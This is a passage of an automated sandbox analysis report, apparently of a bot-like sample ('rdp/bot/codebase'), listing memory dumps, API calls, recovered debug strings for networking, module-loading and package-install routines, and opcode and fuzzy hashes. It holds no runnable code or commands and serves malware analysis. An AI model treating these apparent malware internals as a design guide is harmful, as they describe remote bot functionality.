                                    • Opcode Fuzzy Hash: 9c2fe581f74b2f5098a5e141fddf0f3e6d478d7830d01169853c6c749ca42601
                                    • Instruction Fuzzy Hash: 1A11B1B0A0C58286F711AB75EC000766660AF9AB54F104231EA6ED3AB5DEBCDA4DCB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                    • API String ID: 1729277954-887953274
                                    • Opcode ID: 44b27321e03e564db89bcccc0e7d5df8cb6a651859ff422f557a8e3a400490fc
                                    • Instruction ID: 2cddbbbf7b873d76a4a6c710b4f3dc57969dd331936bdb1b8e25643f9f5c6fcb
                                    • Opcode Fuzzy Hash: 44b27321e03e564db89bcccc0e7d5df8cb6a651859ff422f557a8e3a400490fc
                                    • Instruction Fuzzy Hash: 9F11B9B16185C686F3629B35EC0046D6660FF8AB54F1842B1E96D97BE4DF7CD50B8B00
                                    APIs
                                    Strings
                                    • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFB23AB34BE
                                    • routine_tx, xrefs: 00007FFB23AB34B7
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                    • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                    • API String ID: 2539320189-3555278722
                                    • Opcode ID: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
                                    • Instruction ID: 4ad3e7c7c2553715b7c36413e0e496a6de9abd0bf2800ea5d3aa33229b247a17
                                    • Opcode Fuzzy Hash: 8cfcbb219258df9e637251702499919102569d352f0da6dfc4e1a77041003f0c
                                    • Instruction Fuzzy Hash: 97311EB5A09A8286EB268F21EC8017D73A5FF56B91F0C4675CA5E637B8CF3DE5418310
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                    • API String ID: 3472027048-1600310168
                                    • Opcode ID: 84be77717edd2999c7616423ea67f6e38ab96d6a84f15685ccd8b38b8928257c
                                    • Instruction ID: 9b7de66c7f0893b2f831326a0be52d9f6d55b62de7f23f62982f15eb4ce0c8a8
                                    • Opcode Fuzzy Hash: 84be77717edd2999c7616423ea67f6e38ab96d6a84f15685ccd8b38b8928257c
                                    • Instruction Fuzzy Hash: 515130A9E0C1C345FA628F34ECC837D6251AF84355F5842B5D4EE6A5D9DF2CE8498700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: 59a41bff71f5d9d606acab6724d86878339935abeb5f622b22a94194d7529e42
                                    • Instruction ID: a43d521fda517bb8d68dee51ee924fad665db34822f6b54dc4af139bb21f3799
                                    • Opcode Fuzzy Hash: 59a41bff71f5d9d606acab6724d86878339935abeb5f622b22a94194d7529e42
                                    • Instruction Fuzzy Hash: 7221DAD0E4C8C386FB264679EE4437E11509F0B309FA84532E50ECA5F1CEDDEC899A4A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: b50f7d9af04bdf8ac8a82e6efc4e5553d617ce4fcb2c9f96e8266a6a6e7f4401
                                    • Instruction ID: fcfd5308e517af86341889e42d2162ec1e620b880215c07c20fac1d9e92f771f
                                    • Opcode Fuzzy Hash: b50f7d9af04bdf8ac8a82e6efc4e5553d617ce4fcb2c9f96e8266a6a6e7f4401
                                    • Instruction Fuzzy Hash: A72185E8E0D5C382FB664E78DCCC37D11409F00369FA845B3D58FAA990DE5CA8C5A752
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: 2b6a6c52b567d369e81db189b2072c9d4e9a6c0f948acaaff6909379fc6761a6
                                    • Instruction ID: 9ad0cdad15c376d325671de4a72bf85c538cd8c00eedfe8819c2de6e3609eb41
                                    • Opcode Fuzzy Hash: 2b6a6c52b567d369e81db189b2072c9d4e9a6c0f948acaaff6909379fc6761a6
                                    • Instruction Fuzzy Hash: 5A218050E2F983C3FF746658A4A4379D1525F60349FE649B2E00ECA6B4CE1CE887536A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: f7eacea280f45015c693a89ef57757bf08c9e43340c975e6a3bd5a496a3bf66f
                                    • Instruction ID: f57ece66a2208832c3cb375d8133ee3fa50af9b48f57356c26d997b747839cc8
                                    • Opcode Fuzzy Hash: f7eacea280f45015c693a89ef57757bf08c9e43340c975e6a3bd5a496a3bf66f
                                    • Instruction Fuzzy Hash: 9D1149E0F0D5A691F9236A39EC406B422106F177B4F502334D92DCB6F1EE9CAE468301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: c142d803a55d224ef68baa2862091450f67a5483f883c1677db543f6e56db5bc
                                    • Instruction ID: 5f76514991443c78fe5ef7a9091bcf62005ce5bc32fbdf89c4b1cf65edb628f8
                                    • Opcode Fuzzy Hash: c142d803a55d224ef68baa2862091450f67a5483f883c1677db543f6e56db5bc
                                    • Instruction Fuzzy Hash: EA116DD0E0C593A1FA625735EE512B412446F1B7B4F511330E92DCAAF2DEDCED068300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
                                    • Instruction ID: f4e4e08836e677c6f629492f2cb8dcc0dae2e895cf4b198d402a94350b59bf68
                                    • Opcode Fuzzy Hash: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
                                    • Instruction Fuzzy Hash: A1118FE0A2D68741E5129734EC516BD1242AF277B4F4D07B2E82DBA6FADE1CE9568300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: a022570f76a87d175e6b89a9e29889a2c9fff595502eb920f882fbc327c3d23e
                                    • Instruction ID: 715a4f69216d4e401d0e8367a32d9be70a09da5d3008f3c7ac6117a88a6e5651
                                    • Opcode Fuzzy Hash: a022570f76a87d175e6b89a9e29889a2c9fff595502eb920f882fbc327c3d23e
                                    • Instruction Fuzzy Hash: 80115EDCA0C5D752F6265F35EC8A37C12506F81BA4E5813B1D8EDBA5E6DE5CE5078300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: 0f3ff3b2ca26c0a814a37c163e02db9f32d8edde5c444f807830ff1ab6393cc4
                                    • Instruction ID: e749051469cc3d8d5326f5181a218f3c60ff8264519db11df2611295e1ffb68c
                                    • Opcode Fuzzy Hash: 0f3ff3b2ca26c0a814a37c163e02db9f32d8edde5c444f807830ff1ab6393cc4
                                    • Instruction Fuzzy Hash: 8A116AD4F1C9CB81FA665334EC902BC1240AF47BA4F4803B0D82DAAAE6DF1CA9578300
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,?,service,0000027B435613D0,00007FF7AABD2910), ref: 00007FF7AABD2312
                                    • GetLastError.KERNEL32(?,?,service,0000027B435613D0,00007FF7AABD2910), ref: 00007FF7AABD233E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                    • API String ID: 4085810780-4145076245
                                    • Opcode ID: afa2715ad1d40dcdb6138738783ab23cee6b69dc419e77c1a9849a41664b9388
                                    • Instruction ID: 055b9e1915e2bed52af2c870a327ea9b26ff98ff0151575f93414feba0676b4a
                                    • Opcode Fuzzy Hash: afa2715ad1d40dcdb6138738783ab23cee6b69dc419e77c1a9849a41664b9388
                                    • Instruction Fuzzy Hash: F1F05E70A4F697C9FDA1B75AE8405B4A2506F65B98FCB00B1CC0C17771ED2CA6878330
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: d4488d18e0a42c918a267e293ea772df4275023f8361731b7d862ee179a190a8
                                    • Instruction ID: dc4b466de12d3149ade6b2d25b8fa14e7a0a672fe92dc752862782bee23e3c9d
                                    • Opcode Fuzzy Hash: d4488d18e0a42c918a267e293ea772df4275023f8361731b7d862ee179a190a8
                                    • Instruction Fuzzy Hash: 5AF0C4E4F0C58391FA139F30EC45BE42220AF56384F44603AD95D8A2B1AE9CEE49C741
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: 977bd74782d614b196615815b96a5c257b6fe7e37f6e636fd22ddd5c7e52f119
                                    • Instruction ID: ed689349e978a20d494927d31243b7811b3a31116b0d710ab53a17449e5266f0
                                    • Opcode Fuzzy Hash: 977bd74782d614b196615815b96a5c257b6fe7e37f6e636fd22ddd5c7e52f119
                                    • Instruction Fuzzy Hash: 94F049E1F4E683D1FB129B31EC453F42214AF56384F440436D40DCA1B5AEACED898700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
                                    • Instruction ID: d421f0b4116378b7470e7e96fa79a9612bf1ba432f600b6dbcf8417fe2ba8b2f
                                    • Opcode Fuzzy Hash: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
                                    • Instruction Fuzzy Hash: 1AF0FFE0B1858691FB139734EC563FC12116F62385F8C0AB2D45D6A5BAED5DEA49C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: b03f20fe3f20e1b22ed287096309a162714d679d7d2059db2c8f5ad47a950a63
                                    • Instruction ID: a11be200517f4d59e9efb84c21aa0f398fb7adacd356930c5bd272774734205a
                                    • Opcode Fuzzy Hash: b03f20fe3f20e1b22ed287096309a162714d679d7d2059db2c8f5ad47a950a63
                                    • Instruction Fuzzy Hash: E1F049E9B185C391FB129F31EC993FD1260AF91784F4C00B2C8CD6A5A2EE1CE5498300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: bc4c520f6590c09bcddd1a732d5270efd1af774c120911b4238902bc3e0d488b
                                    • Instruction ID: 2ca1a06afc235fedc5022af3e8512be3a8074496f01cfde0aeb0a05eff98b9df
                                    • Opcode Fuzzy Hash: bc4c520f6590c09bcddd1a732d5270efd1af774c120911b4238902bc3e0d488b
                                    • Instruction Fuzzy Hash: CFF044E0A0D49A92FB169B34EC217F52250AF16384F40007AD90DDA2BAAEDDEE5C8710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: c98d2fb679d102adca68af7222b5995fb6494255a96ca0710833faf5cff4ed83
                                    • Instruction ID: 218e612722e66c77ce8cf94d229a90c381757f87ecb528a3069e590bb1008ca8
                                    • Opcode Fuzzy Hash: c98d2fb679d102adca68af7222b5995fb6494255a96ca0710833faf5cff4ed83
                                    • Instruction Fuzzy Hash: DDF01DE0B089CB91FB529B30EC457FC2350AF56784F4C01B6D40E6A6D5EE1CE54A8700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$HandleModule_mbscpy
                                    • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                    • API String ID: 3656010895-1379287937
                                    • Opcode ID: db6eed1cd3525cb218b597a370394d1be1573cc38729b3d646ccfd8e6f807412
                                    • Instruction ID: bdaa70ac75fa170549c7bd25ca176b97bac8c6721fddf8a66dcec3c1614b7a09
                                    • Opcode Fuzzy Hash: db6eed1cd3525cb218b597a370394d1be1573cc38729b3d646ccfd8e6f807412
                                    • Instruction Fuzzy Hash: EE31C332A0FA87D6FB60AB54E4903E9A361FB84348FC10472E64E472B5DF6DD50AC750
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: c51739f849e10a46f963a5a3124a536443c51d0326aeb556ed4cbbc75bd3727e
                                    • Instruction ID: eefa134a67656485f600195b7978d1dbe459b36d17a0baead1bf07f969ce5c27
                                    • Opcode Fuzzy Hash: c51739f849e10a46f963a5a3124a536443c51d0326aeb556ed4cbbc75bd3727e
                                    • Instruction Fuzzy Hash: 26F08BE0F0D78791FE139B25EC411A56221AF06BC4F445032CD5C8BBB4EEACAE468301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: 7e03738c070cc10edd4cf49bda78ea93556b05bd29f8f147de0b161cd689fe03
                                    • Instruction ID: 01947791f5d937f0901c5ae055c4dbc1a4d3b178e6aba0c518877456ca4a04e0
